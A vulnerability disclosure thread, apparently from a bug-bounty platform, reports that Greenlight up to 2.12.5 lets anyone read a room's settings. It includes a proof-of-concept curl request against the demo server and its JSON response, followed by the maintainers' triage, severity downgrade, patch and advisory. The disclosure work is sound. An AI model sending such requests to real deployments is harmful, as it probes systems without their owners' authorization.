Improper privilege management - Anyone can view room settings. in bigbluebutton/greenlight

Valid

Reported on

May 22nd 2022


Description

Hi bigbluebutton maintainers, I would like to report an improper privilege management, this allows anyone to view any room settings.

Proof of Concept

  1. To demonstrate the vulnerability, I've created a room https://demo.bigbluebutton.org/gl/hoa-j4s-sxx-5gn
  2. Run this curl command to get the room settings
curl -i -s -k -X $'GET' \
    -H $'Host: demo.bigbluebutton.org' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' \
    $'https://demo.bigbluebutton.org/gl/hoa-j4s-sxx-5gn/room_settings'

The response looks like

{"muteOnStart":false,"requireModeratorApproval":true,"anyoneCanStart":false,"joinModerator":false,"recording":false}
  1. Note that there is no token/secret in the above curl command

Impact

Allowing anyone to view any room settings

We are processing your report and will contact the bigbluebutton/greenlight team within 24 hours. a month ago
We have contacted a member of the bigbluebutton/greenlight team and are waiting to hear back a month ago
We have sent a follow up to the bigbluebutton/greenlight team. We will try again in 7 days. a month ago
Anton Georgiev
a month ago

Maintainer


Hi @xiviu!

Thank you for reporting this!!

Overall you are spot-on with your finding about the issue and how to trigger it. However, it is part of a different component of BigBlueButton.

Could you please tweak this (or re-open it) towards GreenLight -- https://github.com/bigbluebutton/greenlight version 2.12.5

For "Occurence" you could point to https://github.com/bigbluebutton/greenlight/blob/master/app/controllers/rooms_controller.rb#L316

Please tweak it so that when we patch it the fix link is to the tagetted project. Much appreciated!

-Anton

xiviu
25 days ago

Researcher


Hi @admin, how should I proceed with this?

Anton Georgiev
25 days ago

Maintainer


Hi @xiviu, Please open a new report but use https://github.com/bigbluebutton/greenlight version 2.12.5 instead of https://github.com/bigbluebutton/bigbluebutton

For "Occurence" you could point to https://github.com/bigbluebutton/greenlight/blob/master/app/controllers/rooms_controller.rb#L316 instead of the current https://github.com/bigbluebutton/bigbluebutton/blob/52e302c28a6bd799762420e3076a92ba11bbaea9/bigbluebutton-html5/imports/ui/components/audio/container.jsx#L23

Once you open the new (more accurate) report we can close this one.

Thanks again! -Anton

We have sent a second follow up to the bigbluebutton/greenlight team. We will try again in 10 days. 24 days ago
Jamie Slome
23 days ago

Admin


@antobinary - sorted 👍

The report is now pointing to the greenlight repository and I have updated the occurrence to your suggestion :)

Let me know if you have any further questions or issues!

Anton Georgiev modified the Severity from High to Low 18 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Anton Georgiev validated this vulnerability 18 days ago

Thanks @xiviu for the report! Thanks @Jamie for applying the tweaks to the report!

We confirm this is a an issue with GreenLight <=2.12.5 and we're looking into patching it.

Upon further investigation the actual severity is Low though, the information that could be revealed to the world is just a few settings related to the meeting. No ids, no secrets, no user data etc. We are still going to patch it, of course.

We have created a GitHub Security Advisory (private for the moment, will be published after the patch has been released, and after some time was provided for administrators to upgrade.) That advisory will have a CVE associated with, so no need to duplicate this here.

xiviu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the bigbluebutton/greenlight team. We will try again in 7 days. 15 days ago
Anton Georgiev
11 days ago

Maintainer


Hi @xiviu,

We have fixed the issue via https://github.com/bigbluebutton/greenlight/pull/3508 and released a patch - https://github.com/bigbluebutton/greenlight/releases/tag/release-2.12.6

On June 17 (in 3 days) we will be in a position to mark this as fixed. We provided a few days to our community to upgrade their GreenLight to the patched version.

We have sent a second fix follow up to the bigbluebutton/greenlight team. We will try again in 10 days. 8 days ago
Anton Georgiev
4 days ago

Maintainer


We have made public the security advisory - https://github.com/bigbluebutton/greenlight/security/advisories/GHSA-phh8-3v6v-7498

Anton Georgiev confirmed that a fix has been merged on d4edbe 4 days ago
The fix bounty has been dropped
to join this conversation